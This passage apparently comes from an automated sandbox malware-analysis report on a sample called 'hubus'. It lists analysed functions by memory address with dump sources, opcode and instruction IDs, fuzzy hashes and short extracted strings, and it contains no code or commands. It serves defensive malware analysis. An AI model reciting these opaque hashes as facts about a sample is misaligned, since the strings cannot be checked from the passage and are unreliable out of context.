                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 4c0b8db05ee3753b53eb5d90248cacf8079e738f853c802052dc0c7a8bcc829c
                                                                                                                                                                                                                                                              • Instruction ID: ef810bc802e60782972c26cf2f935a98b43e660299947d83fe1007f74316a489
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c0b8db05ee3753b53eb5d90248cacf8079e738f853c802052dc0c7a8bcc829c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6C00276E1001A9A8B00DAD9E4408DCB774EB95321B004026E214A6104D63015268B50
                                                                                                                                                                                                                                                              Function 05AC3138 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088273661.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ab0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                                                                                                                                                                              • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                                                                                                                                                                                                              Function 05AC3F78 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088273661.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ab0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                                                                                                                                                                              • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                                                                                                                                                                                                              Function 05AC0698 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088273661.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ab0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                                                                                                                                                                              • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                                                                                                                                                                                                              Function 05AC9878 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088273661.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ab0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                                                                                                                                                                              • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                                                                                                                                                                                                              Function 05AA2F90 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                                                                                                                                                                                                              • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                                                                                                                                                                                                                                              Function 05AA6D6B Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 91e67878961e728b25de0ab85c741ab6d7466d631235384c70bf7d1c44b49660
                                                                                                                                                                                                                                                              • Instruction ID: 552be8120abd0c821758ed1ea8798cef4f709a253f1246c2a7a0b3ecd7a56e47
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91e67878961e728b25de0ab85c741ab6d7466d631235384c70bf7d1c44b49660
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7C09B71714304DFC7198B10D7655297BF3E7D5305755842CE94545314C739CC15DB11
                                                                                                                                                                                                                                                              Function 05AA74A0 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: a6ac6f800b8c8e9201fa217db1103a314b5889906e21c93db6af73d2a9b98503
                                                                                                                                                                                                                                                              • Instruction ID: 7590469f060578bb86c76feecbf98a70dbfbd7b4f68842afa367203ce920fc2e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a6ac6f800b8c8e9201fa217db1103a314b5889906e21c93db6af73d2a9b98503
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16B0923200420CAB87119E84EC08856BB69AB58601B148025F609061118B32A822DB94
                                                                                                                                                                                                                                                              Function 02E50A00 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12073901155.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e50000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: f12c06e41a58974393bf5539c503cdfd5bf7521bbeb7b09371ea5f91a85fee41
                                                                                                                                                                                                                                                              • Instruction ID: b1470f06192ada982cf4a674b442f9bdfd64477230376a50e1e0fca118365c14
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f12c06e41a58974393bf5539c503cdfd5bf7521bbeb7b09371ea5f91a85fee41
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1190223002020C8B028023C03C08080B38CC2800223800003A80F000008A0020200A80
                                                                                                                                                                                                                                                              Function 02E50850 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12073901155.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e50000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 8ae514d482bb9bea73fce77b3c2e2b597d490290c560a8eb4bd21d4f931ec3fa
                                                                                                                                                                                                                                                              • Instruction ID: 7650f375cd1fc536662cf77b0c2b16d5486822d9704bad7ee503a2089686aecb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ae514d482bb9bea73fce77b3c2e2b597d490290c560a8eb4bd21d4f931ec3fa
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB90023104460D8F4A50279A7C0D595775C9584626B851052B50D466459F5564605695
                                                                                                                                                                                                                                                              Function 02E51940 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12073901155.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e50000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                                                                                                                                                                                                              • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40

                                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                                              Function 02E50D91 Relevance: 6.5, Strings: 5, Instructions: 281COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12073901155.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e50000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: <Z;@$TJBr$Te=r$r)xI$xb@r
                                                                                                                                                                                                                                                              • API String ID: 0-2856210524
                                                                                                                                                                                                                                                              • Opcode ID: e863caab0d24e6df1e666a369ab867ea1d8e8e1430f9a86aad1cb928eb42cf37
                                                                                                                                                                                                                                                              • Instruction ID: 37a670fdade01f0628aa694e784ad3c21444ed8978e546f7a8787136be35a74a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e863caab0d24e6df1e666a369ab867ea1d8e8e1430f9a86aad1cb928eb42cf37
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5FB16975A502299FDB14DF68C994BADBBF2BF88304F1491A8E40AEB351DB34AC45CB50
                                                                                                                                                                                                                                                              Function 05AC9D00 Relevance: 2.8, Strings: 2, Instructions: 280COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088273661.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ab0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: <Z;@$r)xI
                                                                                                                                                                                                                                                              • API String ID: 0-1708893652
                                                                                                                                                                                                                                                              • Opcode ID: c2968a4219363ca3eb843d27b5b2536a8c388b3f12eacee6d74a50e0cb344ffc
                                                                                                                                                                                                                                                              • Instruction ID: b22b007e2a5a9491086625acb450bdf23bd9176cb40d33d587c97e95c73e0a02
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2968a4219363ca3eb843d27b5b2536a8c388b3f12eacee6d74a50e0cb344ffc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4DB13872E005299FCB15CFA9C981ABEFBF1FB48344F2486A9D455E7201D734E942CB90
                                                                                                                                                                                                                                                              Function 02E59FA8 Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12073901155.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e50000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'=r$4'=r
                                                                                                                                                                                                                                                              • API String ID: 0-1271949470
                                                                                                                                                                                                                                                              • Opcode ID: 0d46c8159d435f103d4ae2306bf8626051586f7e6e8f565c1eb000e1562df4e0
                                                                                                                                                                                                                                                              • Instruction ID: 7911afc00f0c1a47bc3806d8842e35e5ebf9b635ea2bb13ae0e6532b9157dbb5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d46c8159d435f103d4ae2306bf8626051586f7e6e8f565c1eb000e1562df4e0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7712871A10A098FD709DFAEF855B8ABBF3FBC8201F14C06AD4059B664DF345846DBA0
                                                                                                                                                                                                                                                              Function 02E59FB8 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12073901155.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e50000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'=r$4'=r
                                                                                                                                                                                                                                                              • API String ID: 0-1271949470
                                                                                                                                                                                                                                                              • Opcode ID: 113ced5a08b2c27bfb20f91676cde4f0177eb183581b4aaad002b13650f6e4c6
                                                                                                                                                                                                                                                              • Instruction ID: 52e04a00150337e8e315a85299214bc60e5c943e282d15a456ec9c1e553c1195
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 113ced5a08b2c27bfb20f91676cde4f0177eb183581b4aaad002b13650f6e4c6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D711871A10A098FD709DFAEF855B8ABBF3FBC8201F04C46AD4059B664DF345846DBA1
                                                                                                                                                                                                                                                              Function 02E50B07 Relevance: 2.7, Strings: 2, Instructions: 154COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12073901155.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e50000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'=r$4'=r
                                                                                                                                                                                                                                                              • API String ID: 0-1271949470
                                                                                                                                                                                                                                                              • Opcode ID: 28446655b0c5f49490e2c5f2fa6cce605fd9ccf539467401dab78e7cc81875f5
                                                                                                                                                                                                                                                              • Instruction ID: c66dc5ad26073a198e5ca388c8eb1bca18cdbd0fd2d0e495b88ded3942756a56
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 28446655b0c5f49490e2c5f2fa6cce605fd9ccf539467401dab78e7cc81875f5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A611D71A142069FD759DF7AED5068A7BF3BFC4300F18C53AC409A72A8DF7A58158B50
                                                                                                                                                                                                                                                              Function 02E50B18 Relevance: 2.6, Strings: 2, Instructions: 149COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12073901155.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e50000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'=r$4'=r
                                                                                                                                                                                                                                                              • API String ID: 0-1271949470
                                                                                                                                                                                                                                                              • Opcode ID: 199a6cf5b124157298f683585537a2d5e9a0358554df3a0e0ea773c7c0cb457e
                                                                                                                                                                                                                                                              • Instruction ID: be9f55235279b93d86486df08f823951bd6b6536fe7039c5246d8c8fb5574227
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 199a6cf5b124157298f683585537a2d5e9a0358554df3a0e0ea773c7c0cb457e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C511C71A142069FD719EF7AED5064ABAF3BBC4300F18D53AC408A72A8DF7E9815CB50
                                                                                                                                                                                                                                                              Function 05A8CF08 Relevance: 1.7, Strings: 1, Instructions: 431COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: `*#o
                                                                                                                                                                                                                                                              • API String ID: 0-1276960897
                                                                                                                                                                                                                                                              • Opcode ID: 7a3c7c8c19d41eddfffbf0d03da91c78bb12772b699fa0f32df77f97f4bb1ee0
                                                                                                                                                                                                                                                              • Instruction ID: c20f2b719d3f3e47a7692158d0bceacffb847e109f59099237a861f16de2ac07
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a3c7c8c19d41eddfffbf0d03da91c78bb12772b699fa0f32df77f97f4bb1ee0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA12C270E046189BDB14DFAAC980A9EFBF2FF88304F24C169D419EB259D734A946CF50
                                                                                                                                                                                                                                                              Function 05AAB7F0 Relevance: 1.4, Strings: 1, Instructions: 197COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: dAr
                                                                                                                                                                                                                                                              • API String ID: 0-1474158906
                                                                                                                                                                                                                                                              • Opcode ID: 0d25291292d0e0cd277661e606eabec806c4caa47397e4095cbdff36a9dfc52b
                                                                                                                                                                                                                                                              • Instruction ID: ed892948498fa36b9fcc6012413bcfd47dd80e636f999f5206bdd98e4b8746e3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d25291292d0e0cd277661e606eabec806c4caa47397e4095cbdff36a9dfc52b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E281F378A0521CCFDB14DFA9E898BADBBF2FB49305F1090A9D409A7284DB345D85CF61
                                                                                                                                                                                                                                                              Function 05AAB7E0 Relevance: 1.4, Strings: 1, Instructions: 196COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: dAr
                                                                                                                                                                                                                                                              • API String ID: 0-1474158906
                                                                                                                                                                                                                                                              • Opcode ID: b6148b2ca0c15d367eac6d5175fa61f7c54aab4ae30371ac2a97a0eabc0e442d
                                                                                                                                                                                                                                                              • Instruction ID: 828a87eaf3ff3694e7f77729dc425256f667c56ef73a824e285815a29f75ac52
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6148b2ca0c15d367eac6d5175fa61f7c54aab4ae30371ac2a97a0eabc0e442d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA810478A0521CCFDB14DFA9E888BADBBF2FB49301F1090A9D409A7284DB345D85CF61
                                                                                                                                                                                                                                                              Function 05AAE20A Relevance: 1.4, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4|Br
                                                                                                                                                                                                                                                              • API String ID: 0-2141330505
                                                                                                                                                                                                                                                              • Opcode ID: 1f7e4d238df993f3ab5077349249b1fc9d8c410d4aa3134778423c3dcdf39614
                                                                                                                                                                                                                                                              • Instruction ID: 139482f82428cd9e64c2026c67df675eb45a96a15012ca0e766165fd8214e983
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f7e4d238df993f3ab5077349249b1fc9d8c410d4aa3134778423c3dcdf39614
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3581E675A05218CFEB64CF29D885BAABBF6FB89301F1480EAD509A7340DB345E85CF51
                                                                                                                                                                                                                                                              Function 05AAE218 Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4|Br
                                                                                                                                                                                                                                                              • API String ID: 0-2141330505
                                                                                                                                                                                                                                                              • Opcode ID: 2fa60a78818f9c7c22bd4743d8bd1055f0985647e00109ea805c48f776404826
                                                                                                                                                                                                                                                              • Instruction ID: aaa9d45c29428381af4f7f83bb7bd619c60d4d5ddd3117e1d43d1ffee13fd139
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fa60a78818f9c7c22bd4743d8bd1055f0985647e00109ea805c48f776404826
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4881D775A05218CFEB64CF29D984BAABBF6FB89301F1480EAD509A7340DB345E85CF51
                                                                                                                                                                                                                                                              Function 05AAC16A Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 2128380932998c47e934ee96ce8fd52f3b1871e78f5c656144ddc1107e25b964
                                                                                                                                                                                                                                                              • Instruction ID: ec79acfb533964b8f3cdb72232ef28a42a59836dd4deb3d0595154146fe984e0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2128380932998c47e934ee96ce8fd52f3b1871e78f5c656144ddc1107e25b964
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC514575E09208CBEB14DFA9E498BEDBBF2FB49721F10902AE415A7250EB345C46CB50
                                                                                                                                                                                                                                                              Function 05AAC178 Relevance: .1, Instructions: 135COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
